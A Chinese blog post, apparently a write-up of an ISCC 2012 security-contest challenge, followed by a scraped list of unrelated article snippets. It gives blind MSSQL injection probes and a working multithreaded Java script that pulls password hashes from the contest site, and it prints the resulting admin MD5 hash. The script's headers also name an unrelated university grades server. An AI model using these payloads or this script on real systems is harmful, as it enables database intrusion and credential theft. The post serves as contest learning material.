wangyi_lin
wangyi_lin

ISCC 2012 真实关第一题

第一天:

整个网站,没有什么思路,无从下手的感觉,拿wwwscan一顿狂扫,发现很多目录都是403,可能是做了IP限制,扫到一个叫做htaccess,

http://www.isclab.org/contest/.htaccess下下来发现是一些转跳的

规则,和一些防下载防列目录的规则,从中找到了服务器的架构   Apache/PHP/Drupal  百度了一下,也没有什么可利用的漏洞。

趁机学习了一下,htaccess的配制方法,先把扫到的文件内容粘上了。

教程在这http://hi.baidu.com/wojiubaibudu/item/4b3513c74a8fe47aced4f817

注释占了很多,一些简单的功能注释已经说的很明白了,主要看一下URL重定向的设置,这的功能比较强大。

规则是所有符合RewriteCond规则的URL都会被重定向到,RewriteRule的地址

正则表达式是个非常蛋疼的东西,可是很多时候会用到。

教程的话看这个http://manual.phpv.net/regular_expression.html

总结一下常用的几个符号

^ 匹配字符串开始
$ 匹配字符串结束
\w 字母下划线汉字
\d 数字
\b 单词的开始或结束
. 任意一字符,除换行
* 前一字符重复零到多次
+ 前一字符重复一到多次
{n} 重复n次

比如防盗链的功能可以这样实现,凡是HTTP_PEFERER(来源URL)与本站URL不配备,NC是忽略大小写。

或者HTTP_FEFERER为空的话,就执行RewriteRule把 .*.(jpe?g|gif|bmp|png)$  这个正则表达式匹配到得字符串替换成

一个服务器上默认的图片,L代表着重定向语句的结束。

RewriteEngine On
RewriteCond %{HTTP_REFERER}!^http://(.+.)?mysite.com/ [NC]
RewriteCond %{HTTP_REFERER}!^$
RewriteRule .*.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpg [L]

伪静态目录可以这样实现,这个伪静态非常有用

搜索引擎友好,用户友好,而且可以掩盖绝大数注入点扫描器的眼睛

规则是这样,他会把用户访问的静态页面目录捕捉到,比如^archiver/((fid|tid)-[0-9]+\.html)$,

然后重定向到动态页面,比如archiver/index.php?$1     $1是反向匹配,代表着正则表达式中第一个括号中的内容。

# 将 RewriteEngine 模式打开 
RewriteEngine On 
# Rewrite 系统规则请勿修改 
RewriteRule ^archiver/((fid|tid)-[0-9]+\.html)$ archiver/index.php?$1 
RewriteRule ^forum-([0-9]+)-([0-9]+)\.html$ forumdisplay.php?fid=$1&page=$2 
RewriteRule ^thread-([0-9]+)-([0-9]+)-([0-9]+)\.html$ viewthread.php?tid=$1&extra=page\%3D$3&page=$2 
RewriteRule ^space-(username|uid)-(.+)\.html$ space.php?$1=$2 
RewriteRule ^tag-(.+)\.html$ tag.php?name=$1



#
# Apache/PHP/Drupal settings:
#

# Protect files and directories from prying eyes.
<FilesMatch "\.(engine|inc|info|install|make|module|profile|test|po|sh|.*sql|theme|tpl(\.php)?|xtmpl|svn-base)$|^(code-style\.pl|Entries.*|Repository|Root|Tag|Template|all-wcprops|entries|format)$">
  Order allow,deny
</FilesMatch>

# Don't show directory listings for URLs which map to a directory.
Options -Indexes

# Follow symbolic links in this directory.
Options +FollowSymLinks

# Make Drupal handle any 404 errors.
ErrorDocument 404 /index.php

# Force simple error message for requests for non-existent favicon.ico.
<Files favicon.ico>
  # There is no end quote below, for compatibility with Apache 1.3.
  ErrorDocument 404 "The requested file favicon.ico was not found.
</Files>

# Set the default handler.
DirectoryIndex index.php

# Override PHP settings. More in sites/default/settings.php
# but the following cannot be changed at runtime.

# PHP 4, Apache 1.
<IfModule mod_php4.c>
  php_value magic_quotes_gpc                0
  php_value register_globals                0
  php_value session.auto_start              0
  php_value mbstring.http_input             pass
  php_value mbstring.http_output            pass
  php_value mbstring.encoding_translation   0
</IfModule>

# PHP 4, Apache 2.
<IfModule sapi_apache2.c>
  php_value magic_quotes_gpc                0
  php_value register_globals                0
  php_value session.auto_start              0
  php_value mbstring.http_input             pass
  php_value mbstring.http_output            pass
  php_value mbstring.encoding_translation   0
</IfModule>

# PHP 5, Apache 1 and 2.
<IfModule mod_php5.c>
  php_value magic_quotes_gpc                0
  php_value register_globals                0
  php_value session.auto_start              0
  php_value mbstring.http_input             pass
  php_value mbstring.http_output            pass
  php_value mbstring.encoding_translation   0
</IfModule>

# Requires mod_expires to be enabled.
<IfModule mod_expires.c>
  # Enable expirations.
  ExpiresActive On

  # Cache all files for 2 weeks after access (A).
  ExpiresDefault A1209600

  <FilesMatch \.php$>
    # Do not allow PHP scripts to be cached unless they explicitly send cache
    # headers themselves. Otherwise all scripts would have to overwrite the
    # headers set by mod_expires if they want another caching behavior. This may
    # fail if an error occurs early in the bootstrap process, and it may cause
    # problems if a non-Drupal PHP file is installed in a subdirectory.
    ExpiresActive Off
  </FilesMatch>
</IfModule>

# Various rewrite rules.
<IfModule mod_rewrite.c>
  RewriteEngine on

  # If your site can be accessed both with and without the 'www.' prefix, you
  # can use one of the following settings to redirect users to your preferred
  # URL, either WITH or WITHOUT the 'www.' prefix. Choose ONLY one option:
  #
  # To redirect all users to access the site WITH the 'www.' prefix,
  # (http://example.com/... will be redirected to http://www.example.com/...)
  # adapt and uncomment the following:
  # RewriteCond %{HTTP_HOST} ^example\.com$ [NC]
  # RewriteRule ^(.*)$ http://www.example.com/$1 [L,R=301]
  #
  # To redirect all users to access the site WITHOUT the 'www.' prefix,
  # (http://www.example.com/... will be redirected to http://example.com/...)
  # uncomment and adapt the following:
  # RewriteCond %{HTTP_HOST} ^www\.example\.com$ [NC]
  # RewriteRule ^(.*)$ http://example.com/$1 [L,R=301]

  # Modify the RewriteBase if you are using Drupal in a subdirectory or in a
  # VirtualDocumentRoot and the rewrite rules are not working properly.
  # For example if your site is at http://example.com/drupal uncomment and
  # modify the following line:
  # RewriteBase /drupal
  #
  # If your site is running in a VirtualDocumentRoot at http://example.com/,
  # uncomment the following line:
   RewriteBase /

  # Rewrite URLs of the form 'x' to the form 'index.php?q=x'.
  RewriteCond %{REQUEST_FILENAME} !-f
  RewriteCond %{REQUEST_FILENAME} !-d
  RewriteCond %{REQUEST_URI} !=/favicon.ico
  RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]
</IfModule>

# $Id: .htaccess,v 1.90.2.5 2010/02/02 07:25:22 dries Exp $


第二天:

漫无目的的搜寻注入点,在于Rank的页面的?page参数这里发现了网站为数不多的几个动态页面。

可是发现,参数经过了过滤,会截取到第一个不是数字的字符为止作为参数,尝试了各种绕过IDS的方法,均未果,蛋疼。


这里需要注意一下URL编码的问题,URL在Internet上传送的时候只支持ASCII码,由于URL中可能有一些ASCII之外的字符

和一些危险的字符,我们使用URL编码把这些字符转换成%XX这种形式。但是,这个转化大部分情况下是由浏览器完成的,

再通过编程语言模拟浏览器访问页面的时候要注意URL编码的问题。


这里有一个各种绕过IDS方法的帖子

http://www.yunsec.net/a/security/wlgf/2011/1017/9537.html

http://wenku.baidu.com/view/39d0dff3f90f76c661371a00.html

http://www.ixpub.net/home.php?mod=space&uid=12690065&do=blog&id=18615

http://blog.renren.com/share/249797970/2731285811

可用性尚未证实,先在这里留个坑。


第三天:

天降大雨,适于睡眠,一觉醒来已经中午了,玩了会地下城,各种被怪虐


第四天:

经高手指示,注入点存在于一个静态页面,果断找到。

http://www.isclab.org/contest/challenge/passlog/1

发现是一个无返错的MSSQL注入点

先测试一下系统表可不可以访问,发现所有的系统表都不能访问

 
and (select count(*) from sysobjects)>0    //当前数据库下
and (select count(*) from master.dbo.sysdatabases)>0
and (select count(*) from syscolumns)>0

先测试几个函数好不好用

and (select count(*) from users where substring(name,1,1)='w')>0    //substring ok
 and (select count(*) from users where ascii(' ')=32)>0     //ascii ok
 and (select count(*) from users where len(name)>0)>0        //len wrong
 and (select count(*) from users where ascii(substring(name,1,1))>0)>0  //ascii+substring ok

最后用来注入的语句是这样的

 and (select count(*) from users where name='wyl091256' and ascii(substring(pass,1,1))>0)>0


果断用TOMCAt架设了一个中转注入页面。

<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> 
<%@ page import="java.io.InputStream"%>
<%@ page import="java.net.URL"%>
<%@ page import="java.net.HttpURLConnection"%>
<%@ page import="java.io.BufferedReader"%>
<%@ page import="java.io.InputStreamReader"%>
<%
	response.setContentType("text/html;charset=UTF-8");
	response.setStatus(HttpServletResponse.SC_MOVED_PERMANENTLY);
	response.setHeader("Pragma","No-Cache"); 
        response.setHeader("Cache-Control","No-Cache"); 
        response.setDateHeader("Expires",   0); 
	
	String word="";
	word=(String)request.getParameter("page");
	out.println("http://www.isclab.org/contest/challenge/passlog/"+word);
	
	String cutrentString="";
	String totalString="";
	InputStream inputStream;
	URL url = new URL("http://www.isclab.org/contest/challenge/passlog/"+word);
	HttpURLConnection connection=(HttpURLConnection)url.openConnection();
	connection.setRequestProperty("Cookie","SESSa2a57b4294507a5753fc449b43b9af6e=d585bc79916fc5fc3f69ccc6fea661fb");
	connection.connect();
	inputStream=connection.getInputStream();
	BufferedReader bufferedReader=new BufferedReader(new InputStreamReader(inputStream));
	while((cutrentString=bufferedReader.readLine())!=null){
		totalString+=cutrentString;
	}
	out.println(totalString);
%>

不过发现一个问题,就是对于没有错误返回的注入点,很多注入工具都不好使。

不过听说 sqlmap 这个工具很强大,python脚本写的,还没有试用,再在这里留个坑。


至此用比较熟的java写了一个程序,来通过注入点跑数据。


注意几点,要把URL转成URL编码,java应该提供了相应的函数,不过我直接硬编码了。

最好使用多线程,并且给HttpURLConnection设置,Timeout参数,在Timeout的时候重启线程。

取消掉缓存,为了保险吧。

及时关闭inputstream以及connection。


import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;


public class injecter{
	private static String cutrentString;
	private static String KEY="admin";
	private static String[] Tables={"name","pass","mail","time"};
	private static String  tableName = "users"; 
	private static String  columnName = "pass";
	private static String userName = "wyl091256";
	private static char[] columnValues = new char[33];
	
	private static class injecterThead extends Thread{
		private static int index;
	
		public injecterThead(int index){
			this.index=index;
		}
		private int midFinder(int index,int start,int end)  throws Exception{
			int mid = (start+end)/2;
			//System.out.println("Finder:"+start+" "+end);
			if (start==end) return mid;
			if (start==mid){
				if (tryURLConnection(end,index))
					return start;
				else 
					return end;
			}
			if (tryURLConnection(mid,index))     //符号是小于
				return midFinder(index,start,mid-1);
			else
				return midFinder(index,mid,end);
		}
		private boolean check(String str){
			return (str.indexOf(KEY)!=-1);
		}
		private String injectionURL(int num,int index){
			return "%20and%20(select%20count(*)%20from%20"+ tableName +
				   "%20where%20name='"+userName+"'" +
				   "%20and%20ascii(substring("+columnName+","+index+",1))%3c"+num+")%3E0";
		}
		private boolean tryURLConnection(int num,int index) throws Exception{
			cutrentString="";
			InputStream inputStream;
			String strURL = "http://www.isclab.org/contest/challenge/passlog/1"+injectionURL(num,index);
			URL url = new URL(strURL);
			//System.out.println(strURL);
			HttpURLConnection connection=(HttpURLConnection)url.openConnection();
			
			
			connection.setRequestProperty("Pragma","No-Cache");
			connection.setRequestProperty("Expires","0");
			connection.setRequestProperty("Cache-Control","no-cache");
			connection.setRequestProperty("Cookie","SESSa2a57b4294507a5753fc449b43b9af6e=11207d61c69c44087266b34bc782808c");
			connection.setRequestProperty("accept", "textml,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); 
			connection.setRequestProperty("Accept-Encoding","gzip, deflate");
			connection.setRequestProperty("Accept-Language","zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3");
			connection.setRequestProperty("Connection","keep-alive");
			connection.setRequestProperty("Host","xscj.hit.edu.cn");
			connection.setRequestProperty("Referer","http://xscj.hit.edu.cn/hitjwgl/xs/cjcx/cx.asp");
			connection.setRequestProperty("User-Agent","Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0");		
			connection.setConnectTimeout(3000);
			connection.setDoOutput(true);
			connection.setDoInput(true);
			connection.setUseCaches(false);
			
			connection.connect();
			
			inputStream=connection.getInputStream();
			BufferedReader bufferedReader=new BufferedReader(new InputStreamReader(inputStream,"utf-8"));
			while((cutrentString=bufferedReader.readLine())!=null){
				//System.out.println(cutrentString);
				if (check(cutrentString)){
					inputStream.close();
					connection.disconnect();
					//System.out.println("True");
					return true;
				}
			}
			inputStream.close();
			connection.disconnect();
			//System.out.println("False");
			return false;
		}
		private void runColumnValue() throws Exception{
			int index=1;
			String value="";
			while (true){
				char c=(char)midFinder(index,0,256);
				if (c==' ' || (int)c==0 || index==32) break;
				System.out.println(c);
				value+=c;
				index++;
			}
			System.out.println(index);
		}
		@Override
		public void run (){
			try{
				columnValues[index]=(char)midFinder(index,0,256);
				System.out.println(index+":"+(int)columnValues[index]);
			}catch(Exception e){
				System.out.println("InitErroe:"+e.getMessage());
				injecterThead it = new injecterThead(index);
				it.run();
				this.stop();
			}
		}
	}
	
	public static void main(String args[]){
		for(int i=1;i<=32;i++){
			injecterThead it = new injecterThead(i);
			it.run();
		}
		
	}
}

很快跑出了我自己的MD5密码和admin的MD5密码

wyl091256

97faf8f61ca07a06f7bb999737158d4c

admin

a9976616854716aa043537627d2f32f3

第五天:

艰苦的破解MD5之旅,很多复杂的密码都无法破解,不过简单的可以在在线网站上得到。

有一个叫做彩虹表的东西貌似很强大。不过因为有几百G没有下载,再次留个坑。

到这里破解第一关的蛋疼之旅就基本结束了。


你可能感兴趣的:(ISCC 2012 真实关第一题)

  • 第04章 06 VTK静态数据模型和动态数据模型示例 捕鲸叉 VTK编程学习VTK信息可视化
    VTK(VisualizationToolkit)提供了多种数据模型来处理和表示各种类型的数据。其中,静态数据模型和动态数据模型是两种不同的数据表示方式,各自具有不同的特点和适用场合。静态数据模型特点静态数据模型是VTK中默认的数据模型,适用于数据不随时间变化的场景。数据结构稳定:在静态数据模型中,数据结构在创建后不发生改变,或者改变的频率很低。高效处理:由于数据结构稳定,VTK可以优化数据的存储
  • 第04章 05 VTK中两个处理管道相关类的说明 捕鲸叉 VTK编程学习VTK信息可视化
    在VTK(VisualizationToolkit)中,vtkPipeline和vtkExecutive是两个关键的类,用于管理和执行数据处理管道。下面将详细论述这两个类的功能、特点,并结合源代码进行说明。vtkPipeline类1.设计目的vtkPipeline类的主要目的是管理和组织数据处理管道。它负责协调管道中各个处理对象(如过滤器、映射器等)之间的数据流动和执行顺序。通过vtkPipeli
  • 爬取电影天堂 越哥的女人
    爬取每部电影的详细信息分析每页的url,可以得到规律是:第t页的url为:http://dytt8.net/html/gndy/dyzz/list_23_t.html于是可以先分析第一页,然后对页数进循环,就可得到所有最新电影的详细信息。fromlxmlimportetreeheaders={"User-Agent":"Mozilla/5.0(WindowsNT6.1;Win64;x64)Appl
  • 腾讯面试:那些腾讯面试过的MySQL场景问题 腾讯mysql数据库面试问题
    今天我将那些腾讯面试过的MySQL场景问题给大家整理出来,本文将跟大家一起来探讨如何回答这些问题。1.一个6亿的表a,一个3亿的表b,通过外间tid关联,你如何最快的查询出满足条件的第50000到第50200中的这200条数据记录?2.一条sql执行过长的时间,你如何优化,从哪些方面入手?3.索引已经建好了,那我再插入一条数据,索引会有哪些变化?4.mysql的是怎么解决并发问题的?5.MySQL
  • AI跟踪报道第62期-本周AI新闻: 微软推出Copilot的AI Agent和Computer Control 新加坡内哥谈技术 人工智能copilot大数据
    每周跟踪AI热点新闻动向和震撼发展想要探索生成式人工智能的前沿进展吗?订阅我们的简报,深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同,从行业内部的深度分析和实用指南中受益。不要错过这个机会,成为AI领域的领跑者。点击订阅,与未来同行!订阅:https://rengongzhineng.io/油管视频:https://youtu.be/_Egli1MlVWk?si=DIjVm2l
  • v-model动态绑定值 努力搬砖的程序媛儿 vue.jselementuijavascript
    第{{i}}个获取表单值exportdefault{data(){return{form:{},//传入的参数formLength:6}},methods:{getData(){console.log(this.form)}}}
  • SSL证书申请终极指南 Gworg sslhttps网络协议
    SSL验证是确认网站或服务器提供的SSL证书的真实性和有效性的过程。SSL证书验证是确认网站或服务器提供的SSL证书的真实性和有效性的过程。SSL证书是用于在客户端(例如Web浏览器)和服务器之间建立安全连接的数字证书。它们对于确保通过互联网传输的数据的机密性、完整性和真实性至关重要。在SSL证书验证过程中,客户端会检查证书的数字签名,以确保该证书是由受信任的证书颁发机构(CA)颁发的。客户端还会
  • C++:将字符数组rkpryyrag,每个字母转换为其前面第13个字母后输出,如果超过a则从z再继续接着数。例如:b前面第1个字母是a。a前面第3个字母是x。 程序员东min c++开发语言算法
    代码如下:#include#includeusingnamespacestd;intmain(){stringstr="rkpryyrag";for(inti=0;i='a'&&str[i]='a'&&str[i]<='z'):检查当前字符是否是小写字母,因为小写字母的ASCII值范围是'a'到'z'。if(str[i]-'a'<13):对于小写字母,计算该字母与'a'的差值,如果差值小于13,那
  • 天梯赛 L3-009 长城 计算几何 样例过了就是过了 算法数据结构c++
    一题目二思路这道题就是找凸点的个数,就是答案。可能有些人会说,那不就是大于左右两边就是凸点吗,只对了一半,如下图所示,B点也是算凸点,但是并没有大于左右两边。因此,我们判断凸点的依据,是看AB的斜率是否大于AC的斜率,如图所示,AB的斜率大于AC的斜率,所以是凸点。反之,不是。此外,我们用一个栈去维护凸点,就可以得到凸点的个数,也就是答案。三代码#include#include#defineint
  • 反向代理模块1 xianwu543 mysql数据库pythondjangoc++
    1概念1.1反向代理概念反向代理是指以代理服务器来接收客户端的请求,然后将请求转发给内部网络上的服务器,将从服务器上得到的结果返回给客户端,此时代理服务器对外表现为一个反向代理服务器。对于客户端来说,反向代理就相当于目标服务器,只需要将反向代理当作目标服务器一样发送请求就可以了,并且客户端不需要进行任何设置。1.2特点反向代理是代理服务器,为服务器收发请求,使真实服务器对客户端不可见。原文链接:h
  • Github配置SSH连接方式 nk南枫 githubssh
    1.检查是否有SSH密钥使用以下命令检查是否有一个SSH密钥。如果没有,需要生成一个新的密钥ls-al~/.ssh如果有看到类似id_rsa和id_rsa.pub的文件,说明已经有SSH密钥了,可以直接跳转到第3步2.生成新的SSH密钥使用以下命令生成一个新的SSH密钥ssh-keygen-trsa-b4096-C"[email protected]"在提示输入文件保存位置时,按回车键使
  • 计算之魂1.3 例题总和最大区间问题 独正己身 算法python算法
    一、题目给定一个实数序列,设计一个最有效的算法,找到一个总和最大的区间。如[1.5,-12.3,3.2,-5.5,23.2,3.2,-1.4,-12.2,34.2,5.4,-7.8,1.1,-4.9]总和区间为[4,9],即第5个数23.2到第10个数5.4。二、解法这道题作者的目的是让我们对算法复杂度产生了解,不同的算法之间存在复杂度优劣,在写代码时最直观的想法写出来的代码效率可能不是最高的。2
  • android+ffmpeg库使用教程,适用于Android的ffmpeg(使用教程:“ ffmpeg和Android.mk”)... OF COURSE想当然
    我正在尝试为Android编译ffmpeg。我已经找到了关于该主题的几篇文章,但似乎都没有。如果尝试构建ffmpeg,它会发布在[1]上。是否有人使用这些教程成功编译了ffmpeg?我不确定如何实现步骤4到5。STEP4:配置...步骤5:CD到您的NDK根目录,键入makeTARGET_ARCH=armAPP=ffmpeg-org在我看来,按照第5步的教程中的说明构建类似的应用程序需要一些先前的
  • 鸿蒙UI主线程任务调度原理介绍及最佳实践 harmonyos
    课程简介本课程是【HarmonyOSTechTalk】的第18课。本次交流重点围绕鸿蒙UI展开。其中,主线程在整个应用的任务处理中占据关键地位,其任务调度机制更是核心要点。开发者可通过子线程向主线程抛任务的方式,有效避免主线程阻塞,提升整体性能。而状态驱动UI更新则是一种推荐的高效模式,它依据应用状态的变化精准触发UI刷新,避免不必要的更新操作。深入理解并运用鸿蒙UI主线程任务调度机制,开发者能够
  • ArkUI原生页面滑动性能分析优化实践 harmonyos
    课程简介本课程是【HarmonyOSTechTalk】的第20课。本次交流核心为ArkUI原生页面的滑动性能相关内容。从HarmonyOS渲染原理切入,这是理解页面呈现与滑动效果的根基。深入剖析应用滑动性能问题的分析思路,为开发者提供排查问题的有效方法。详细阐述针对典型性能问题的优化手段,涵盖代码优化、资源管理等多方面。开发者通过此次交流,能够精准把握ArkUI原生页面滑动性能的关键要点,提升性能
  • HarmonyOS Next Developer Beta5 8月尝鲜版版本说明 harmonyos
    课程简介本课程是【HarmonyOSTechTalk】的第13课。本次主要围绕HarmonyOSNEXT的DeveloperBeta5-8月尝鲜版展开介绍。HarmonyOSNEXT代表着鸿蒙系统的未来发展方向,此次的DeveloperBeta5版本尤为值得关注。版本配套涵盖了一系列的开发工具和文档,为开发者提供全面支持。新增特性方面,可能会有新的功能模块或技术优化,为系统带来新的活力。变更特性则
  • DevEcoStudio性能工具集介绍 harmonyos
    课程简介本课程是【HarmonyOSTechTalk】的第15课。本次交流聚焦于IDE性能工具集这一关键开发辅助资源。该工具集涵盖多方面重要功能,性能检测可精准定位应用运行中可能存在的效率瓶颈与问题所在;性能分析则深入挖掘问题根源,剖析各类性能数据背后的关联与原因;而性能指导依据专业知识与经验提供最佳解决方案。开发者借助这一强大的IDE性能工具集,能在鸿蒙应用开发过程中显著提升性能优化分析效率,有
  • 问题调试定位法宝箱及动态启停/采样抓栈方案 harmonyos
    课程简介本课程是【HarmonyOSTechTalk】的第16课。本次围绕HarmonyOS应用开发展开。着重介绍其关键的调试工具及高效定位问题的方法。其中,调试工具涵盖堆栈异常解析,可依据常见异常格式深入剖析问题根源。通用日志与离线日志过滤能力有助于精准筛选有用信息,配合应用沙箱访问与智能检测功能,全方位辅助开发。DFX维测领域的抓栈和trace能力同样重要,明确其启用方式、规格以及解读方法,能
  • 帮助应用实现免密身份认证的移动端能力 harmonyos
    课程简介本课程是【HarmonyOS主题课:HarmonyOSSDK开放能力】的第17课。本课程致力于帮助应用实现免密身份认证的移动端能力。深入探讨FIDO、IIFAA、SOTER等核心技术标准,详细解析FIDO免密身份认证的原理与流程,让开发者理解其强大的安全与便捷性。全面剖析IIFAA免密身份认证的特色优势与应用场景,以及SOTER所提供的独特保障机制。通过理论讲解、案例分析与实践操作指导,开
  • 帮助应用打造场景化语音服务 harmonyos
    课程简介本课程是【HarmonyOS主题课:HarmonyOSSDK开放能力】的第18课。本课程专注于助力应用构建场景化语音服务。深入介绍SpeechKit及其重要组件,如朗读控件可将文本转化为自然流畅的语音输出,为用户提供有声阅读体验;AI字幕控件(AICaption)能精准识别语音并生成实时字幕,在视频播放、直播等场景大显身手。详细阐述其广泛的适用场景,包括教育学习辅助、无障碍信息传播等领域。
  • 帮助应用实现更好的推广下载能力 harmonyos
    课程简介本课程是【HarmonyOS主题课:HarmonyOSSDK开放能力】的第14课。本课程旨在助力应用实现卓越的推广下载能力。全面深入讲解应用市场相关要点,包括应用市场推荐机制与更新功能的深度解析,让开发者了解如何提升应用曝光与更新效率。详细阐述展示应用详情页以促进下载安装目标应用的有效策略,以及查询广告验签版本的关键步骤。同时教授获取模块安装信息与添加按需加载模块的实用技术,使开发者能够优
  • 帮助应用实现实时语音与文本的相互转换 harmonyos
    课程简介本课程是【HarmonyOS主题课:HarmonyOSSDK开放能力】的第10课。本课程专为助力应用实现实时语音与文本相互转换而设。课程将深入讲解CoreSpeechKit这一基础语音服务,详细阐述其语音识别(SpeechRecognizer)能力,使开发者能精准掌握语音转文本的技术要点与应用方式。同时全面剖析文本转语音(TextToSpeech)功能,包括其原理、参数设置及优化策略。通过
  • 构建灵活高效的消息推送能力 harmonyos
    课程简介本课程是【HarmonyOS主题课:HarmonyOSSDK开放能力】的第3课。本课程聚焦于构建灵活高效的消息推送能力。首先引导开发者认识并开通推送服务,为后续推送工作奠定基础。深入讲解推送通知消息,让开发者掌握其有效应用。详细解析推送卡片刷新消息与推送通知扩展消息,助力拓展推送功能的多样性与深度。同时,对推送实况窗消息进行剖析,使开发者能充分利用这一形式增强信息传递效果。通过本课程学习,
  • 让您的应用快速拥有账号能力 harmonyos
    课程简介本课程是【HarmonyOS主题课:HarmonyOSSDK开放能力】的第21课。本课程旨在帮助开发者快速集成账号功能到应用中,通过使用华为的AccountKit(华为账号服务)。AccountKit提供了一键登录功能,允许用户通过华为账号快速登录,简化了登录流程,提升了用户体验。课程主要内容和亮点:登录功能、获取用户信息、未成年人模式、样本代码和实践。通过本课程的学习,开发者将能够为应用
  • 20250117面试鸭特训营第25天 Again_acme 面试鸭特训营面试网络职场和发展
    更多特训营笔记详见个人主页【面试鸭特训营】专栏2501171.什么是用户态和内核态?用户态(UserMode)和内核态(KernelMode)是操作系统中的两种运行模式,用于区分应用程序与操作系统内核的操作权限。用户态(UserMode)权限应用程序在用户态下运行,权限较低,不能直接访问硬件或进行特权操作和敏感操作。应用程序需要通过系统调用与内核进行通信,由内核代为执行敏感操作。安全性用户态的优势
  • 20250101面试鸭特训营第9天 Again_acme 面试鸭特训营面试职场和发展
    更多特训营笔记详见个人主页【面试鸭特训营】专栏2501011.MySQL中如何解决深度分页的问题?什么是深度分页问题--查询第2页的10条数据,即第21~30条数据select*fromstudentorderbyidlimit2,10;--查询第200000页的10条数据,即第200001~200010条数据select*fromstudentorderbyidlimit200000,10;在分
  • 20250110面试鸭特训营第18天 Again_acme 面试鸭特训营面试职场和发展
    更多特训营笔记详见个人主页【面试鸭特训营】专栏2501101.常见的HTTP状态码有哪些?状态码由三位数组组成,且第一位数字表示类别常见的HTTP状态码分为五大类1xx:信息响应状态码标识含义100Continue服务器已接收请求的初步部分,客户端应继续请求101SwitchingProtocols服务器同意协议,如从HTTP切换到WebSocket2xx:成功状态码标识含义200OK请求成功,服
  • 20241230面试鸭特训营第7天 Again_acme 面试鸭特训营面试职场和发展
    更多特训营笔记详见个人主页【面试鸭特训营】专栏2412301.MySQL中的事务隔离级别有哪些?常见并发问题名称含义脏写一个事务修改了另一个未提交事务的数据脏读一个事务读取了另一个未提交事务修改的数据重复读一个事务多次读取同一数据时,由于其他事务的修改,返回了不同的结果幻读一个事务前后两次在进行范围查询时,由于另一个事务的插入操作,导致前后读取不一致读未提交一个事务可以看到其他事务未提交的数据修改
  • C语言蓝桥杯组题目 小猿_00 C语言入门到超神c语言蓝桥杯开发语言
    文章目录前言创作不易,你的鼓励,我的动力,学有所成,则是意义;题目第一题.1,2,3,4能组成多少个互不相同且无重复数字的三位数?都是多少?第二题:一个整数,它加上100后是一个完全平方数,再加上168又是一个完全平方数,请问该数是多少?第三题:输入某年某月某日,判断这一天是这一年的第几天?第四题:输入三个整数X,Y,Z,请把这三个数由小到大输出第五题:C语言用*号输出字母C的图案1第六题:C语言
  • C++数据结构——中序遍历二叉树 祖安大龙 C/C++算法数据结构数据结构c++算法
    中序遍历二叉树按完全二叉树的层次遍历给出一棵二叉树的遍历序列(其中用0表示虚结点),要求输出该二叉树的深度及中序遍历该二叉树得到的序列。输入格式:首先输入一个整数T,表示测试数据的组数,然后是T组测试数据。每组测试数据首先输入一个正整数n(n≤1000),代表给出的二叉树的结点总数(当然,其中可能包含虚结点)。结点编号均为正整数,且各不相同。然后输入n个正整数,表示按完全二叉树(即第1层1个结点,
  • java工厂模式 3213213333332132 java抽象工厂
    工厂模式有 1、工厂方法 2、抽象工厂方法。 下面我的实现是抽象工厂方法, 给所有具体的产品类定一个通用的接口。 package 工厂模式; /** * 航天飞行接口 * * @Description * @author FuJianyong * 2015-7-14下午02:42:05 */ public interface SpaceF
  • nginx频率限制+python测试 ronin47 nginx 频率 python
           部分内容参考:http://www.abc3210.com/2013/web_04/82.shtml 首先说一下遇到这个问题是因为网站被攻击,阿里云报警,想到要限制一下访问频率,而不是限制ip(限制ip的方案稍后给出)。nginx连接资源被吃空返回状态码是502,添加本方案限制后返回599,与正常状态码区别开。步骤如下:
  • java线程和线程池的使用 dyy_gusi ThreadPoolthreadRunnabletimer
    java线程和线程池 一、创建多线程的方式     java多线程很常见,如何使用多线程,如何创建线程,java中有两种方式,第一种是让自己的类实现Runnable接口,第二种是让自己的类继承Thread类。其实Thread类自己也是实现了Runnable接口。具体使用实例如下: 1、通过实现Runnable接口方式 1 2
  • Linux 171815164 linux
    ubuntu kernel http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.1.2-unstable/ 安卓sdk代理 mirrors.neusoft.edu.cn        80 输入法和jdk sudo apt-get install fcitx su
  • Tomcat JDBC Connection Pool g21121 Connection
           Tomcat7 抛弃了以往的DBCP 采用了新的Tomcat Jdbc Pool 作为数据库连接组件,事实上DBCP已经被Hibernate 所抛弃,因为他存在很多问题,诸如:更新缓慢,bug较多,编译问题,代码复杂等等。        Tomcat Jdbc P
  • 敲代码的一点想法 永夜-极光 java随笔感想
                  入门学习java编程已经半年了,一路敲代码下来,现在也才1w+行代码量,也就菜鸟水准吧,但是在整个学习过程中,我一直在想,为什么很多培训老师,网上的文章都是要我们背一些代码?比如学习Arraylist的时候,教师就让我们先参考源代码写一遍,然
  • jvm指令集 程序员是怎么炼成的 jvm 指令集
    转自:http://blog.csdn.net/hudashi/article/details/7062675#comments       将值推送至栈顶时 const ldc  push   load指令 const系列 该系列命令主要负责把简单的数值类型送到栈顶。(从常量池或者局部变量push到栈顶时均使用) 0x02 &nbs
  • Oracle字符集的查看查询和Oracle字符集的设置修改 aijuans oracle
    本文主要讨论以下几个部分:如何查看查询oracle字符集、 修改设置字符集以及常见的oracle utf8字符集和oracle exp 字符集问题。 一、什么是Oracle字符集 Oracle字符集是一个字节数据的解释的符号集合,有大小之分,有相互的包容关系。ORACLE 支持国家语言的体系结构允许你使用本地化语言来存储,处理,检索数据。它使数据库工具,错误消息,排序次序,日期,时间,货
  • png在Ie6下透明度处理方法 antonyup_2006 css浏览器FirebugIE
    由于之前到深圳现场支撑上线,当时为了解决个控件下载,我机器上的IE8老报个错,不得以把ie8卸载掉,换个Ie6,问题解决了,今天出差回来,用ie6登入另一个正在开发的系统,遇到了Png图片的问题,当然升级到ie8(ie8自带的开发人员工具调试前端页面JS之类的还是比较方便的,和FireBug一样,呵呵),这个问题就解决了,但稍微做了下这个问题的处理。 我们知道PNG是图像文件存储格式,查询资
  • 表查询常用命令高级查询方法(二) 百合不是茶 oracle分页查询分组查询联合查询
